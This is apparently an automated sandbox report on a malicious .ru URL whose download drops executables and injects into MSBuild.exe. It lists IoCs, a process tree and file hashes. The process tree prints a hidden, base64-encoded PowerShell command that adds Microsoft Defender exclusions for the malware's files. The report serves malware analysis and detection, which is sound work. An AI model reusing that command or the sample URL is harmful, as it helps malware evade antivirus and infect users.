Analysis
max time kernel
70s
max time network
75s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags
arch:x64
arch:x86
image:win11-20250313-en
locale:en-us
os:windows11-21h2-x64
system
submitted
26/03/2025, 19:01
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://awndsjkduiukekwltdadjwadawds.ru/awidsmdjnfsd
Resource
win11-20250313-en
General
Target
http://awndsjkduiukekwltdadjwadawds.ru/awidsmdjnfsd
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid | Process
14284 | powershell.exe
Executes dropped EXE 2 IoCs
pid | Process
2056 | Unshbct.exe
8548 | AsyncWaitHandle.exe
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 8548 set thread context of 10000 | 8548 | AsyncWaitHandle.exe | 114
Drops file in Windows directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\SystemTemp | msedge.exe
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description | ioc | Process
File opened for modification | C:\Users\Admin\Downloads\Unshbct.exe:Zone.Identifier | msedge.exe
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133874892947569894" | msedge.exe
Modifies registry class 7 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-167299615-4170584903-1843289874-1000\{31A78B26-DADC-42B0-80F9-52A26A259B9A} | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\MuiCache | MiniSearchHost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | BackgroundTransferHost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | BackgroundTransferHost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | BackgroundTransferHost.exe
Key created | \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\MuiCache | BackgroundTransferHost.exe
NTFS ADS 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\FilterLevel\AsyncWaitHandle.exe\:Zone.Identifier:$DATA | Unshbct.exe
File opened for modification | C:\Users\Admin\Downloads\Unshbct.exe:Zone.Identifier | msedge.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid | Process
14284 | powershell.exe
14284 | powershell.exe
14284 | powershell.exe
8548 | AsyncWaitHandle.exe
8548 | AsyncWaitHandle.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid | Process
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2056 | Unshbct.exe
Token: SeDebugPrivilege | 14284 | powershell.exe
Token: SeDebugPrivilege | 8548 | AsyncWaitHandle.exe
Token: SeDebugPrivilege | 10000 | MSBuild.exe
Suspicious use of FindShellTrayWindow 33 IoCs
pid | Process
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
Suspicious use of SendNotifyMessage 12 IoCs
pid | Process
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
5892 | msedge.exe
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
14108 | MiniSearchHost.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 5892 wrote to memory of 2476 | 5892 | msedge.exe | 78
PID 5892 wrote to memory of 2476 | 5892 | msedge.exe | 78
PID 5892 wrote to memory of 5236 | 5892 | msedge.exe | 79
PID 5892 wrote to memory of 5236 | 5892 | msedge.exe | 79
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 5040 | 5892 | msedge.exe | 80
PID 5892 wrote to memory of 2136 | 5892 | msedge.exe | 82
PID 5892 wrote to memory of 2136 | 5892 | msedge.exe | 82
PID 5892 wrote to memory of 2136 | 5892 | msedge.exe | 82
PID 5892 wrote to memory of 2136 | 5892 | msedge.exe | 82
PID 5892 wrote to memory of 2136 | 5892 | msedge.exe | 82
PID 5892 wrote to memory of 2136 | 5892 | msedge.exe | 82
PID 5892 wrote to memory of 2136 | 5892 | msedge.exe | 82
PID 5892 wrote to memory of 2136 | 5892 | msedge.exe | 82
PID 5892 wrote to memory of 2136 | 5892 | msedge.exe | 82
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Process tree (child processes are indented under their parent):

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://awndsjkduiukekwltdadjwadawds.ru/awidsmdjnfsd
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID: 5892

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x2ac,0x7ff991d7f208,0x7ff991d7f214,0x7ff991d7f220
      PID: 2476

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1848,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:11
      PID: 5236

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2176,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:2
      PID: 5040

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2308,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=2556 /prefetch:13
      PID: 2136

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3404,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=3472 /prefetch:1
      PID: 3300

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3412,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=3476 /prefetch:1
      PID: 5708

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4832,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=4860 /prefetch:1
      PID: 2436

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4732,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=4980 /prefetch:14
      PID: 4800

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4760,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=4788 /prefetch:14
      PID: 1788

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5232,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=5260 /prefetch:14
      PID: 5328

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5404,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=5732 /prefetch:14
      PID: 572

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5680,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=5768 /prefetch:1
      PID: 3760

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5708,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=5776 /prefetch:14
      - Subvert Trust Controls: Mark-of-the-Web Bypass
      - NTFS ADS
      PID: 2412

    C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6464,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=6416 /prefetch:14
      PID: 4236

    C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6464,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=6416 /prefetch:14
      PID: 5220

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6556,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=5376 /prefetch:14
      PID: 3676

        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
          Command line: cookie_exporter.exe --cookie-json=1128
          PID: 3636

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5928,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:14
      PID: 13888

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6572,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:14
      PID: 13896

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6564,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=5772 /prefetch:14
      PID: 13904

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5752,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=3912 /prefetch:14
      PID: 5380

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
  PID: 1344

C:\Windows\System32\rundll32.exe
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID: 4104

C:\Users\Admin\Downloads\Unshbct.exe
  Command line: "C:\Users\Admin\Downloads\Unshbct.exe"
  - Executes dropped EXE
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  PID: 2056

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
  Command line: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID: 14108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARgBpAGwAdABlAHIATABlAHYAZQBsAFwAQQBzAHkAbgBjAFcAYQBpAHQASABhAG4AZABsAGUALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABGAGkAbAB0AGUAcgBMAGUAdgBlAGwAXABBAHMAeQBuAGMAVwBhAGkAdABIAGEAbgBkAGwAZQAuAGUAeABlAA==
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 14284

C:\Windows\system32\BackgroundTransferHost.exe
  Command line: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
  - Modifies registry class
  PID: 7472

C:\Users\Admin\AppData\Roaming\FilterLevel\AsyncWaitHandle.exe
  Command line: C:\Users\Admin\AppData\Roaming\FilterLevel\AsyncWaitHandle.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 8548

    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      - Suspicious use of AdjustPrivilegeToken
      PID: 10000
-
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize 280B
MD5 e5f3655796637b7d0f4a8ed402e119ea
SHA1 3baaf516676664d46727759914745776a166016a
SHA256 22d91a4321390a9445110f04d5600f49f03604a2d7ecadd10c663248295c88dd
SHA512 2125899d678c926c9f85ad81892f8ee91aa0a74e4c533bcb6e48675ebf0eccbe0db17998f3e3ab961cf3beb8fef7f950588398c5868327aa2d33f81bde797ebe

Filesize 2B
MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Filesize 107KB
MD5 40e2018187b61af5be8caf035fb72882
SHA1 72a0b7bcb454b6b727bf90da35879b3e9a70621e
SHA256 b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5
SHA512 a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12

Filesize 2KB
MD5 61390b22f25807959863fb60f453d8f4
SHA1 e49e361cd8ccd79066ac04a0b84c67c72ef2609c
SHA256 dbb6aafd2c036df1f7256f20f1c647e76151643b48e6a925cf8f4de0e7668aa4
SHA512 f15d0803e59f3ab2bf2b8f35c709c27c188991f349897e136364bb297b1d4eb4efb84cb8a25fb3dfebbc6f7af92289805e5d8c46067164be028c1ee6bbd1652d

Filesize 2B
MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Filesize 40B
MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Filesize 16KB
MD5 cbb63e0aae6c509e2c7ba9f83b784db0
SHA1 64d1c6a10dc52f617fb794560ec4a5e550657589
SHA256 f885fa23efe52b88e2c2a4b63417531f2a93d596da8fe6d18b05c6bad8c19298
SHA512 0adb5ba1122b9f7effdf4a51e9c3a42273d5e780972f0177abf258e480b9e77c42fa82daaef92b06248157c6e76b839632b19f4e3d61477c1ebc8c5615bfc9eb

Filesize 16KB
MD5 e40660c343428bb39a411890210dae80
SHA1 c2dc5680cb61a24a3266ff13d22ead6a3698c81c
SHA256 2018771c45cc71269ac22599570d3d78aeabc5fbdf2a7035c6582d4190796f2f
SHA512 2d29e2be5006ffb6dada7a63bd1fea8c7f1f4b39c5a15345bfe61521639ba6eef56a06c5ba0fb9e327d377f64607ab9fbcf4164848c494873311be9fa5fc8b9a

Filesize 37KB
MD5 bab56d81911f9c9361b738f9751301bb
SHA1 7ee69e6ccb3f5aa2d61ff774b1c50b28f56f6bfc
SHA256 faf0b77298b2c5ed527bfb565e093d961426ee58d9a051521c1038fce3c067e9
SHA512 dda7b7711813956396c7872688ef879d913badfa2b2a02e59a7ae99cc58620917d54f5bc32e0fdb083063894be19a4503673ab482ed11a90f9b035ca084c9b75

Filesize 22KB
MD5 0e46106dc42cdbac776cd42008ec6a8f
SHA1 9443c023664c65e3737b5f616f91dfc561b80012
SHA256 e6eeeb7cbdf9c449b35c0e9c5bb87236c4c49114229540a6f0721137910e0ec7
SHA512 e531f76ea17923c7a8411a68ced70b4e2948c0c914d5eaa4521290769fd2c82153465d9c95d1a41668bc76bcb3a31d5e5f3140fc61c1e5b43db589a61c4dc265

Filesize 467B
MD5 15a8b8f754d21c89d5272e5ecd8cc377
SHA1 b91d55c05d6f3371f47a8129f046a05677fee890
SHA256 30e715580a286bfc23830b7284bf580a7ad7530202571f7ebf53e6cd9f00063b
SHA512 2c7160d37acd5aa61de36a3ef8cdd9ddeb346dfc2f3bf3ea8ae925c4a0ddee1c26580f8bdef14070b09ef18ac934066ade3672e41fe1b50d28c98c0624bf80e3

Filesize 23KB
MD5 e895698d2fd3c5c29de61333597881bb
SHA1 9e368331fef38cff4abc5147731e7243d9b35399
SHA256 ae513c1665a5f0ba18d838077f6c15c7a008681e5018c3f3fbbbc174afd6be00
SHA512 97a4f9e765ec30f872ff8178e3153774a61d042556b950c26a2782cad49e6d3978225620047c7a67c8214cbb32b18777d3cf74e04c4461bac2d279790c053af8

Filesize 900B
MD5 0cbcf489ea85b2e02e568483df51c483
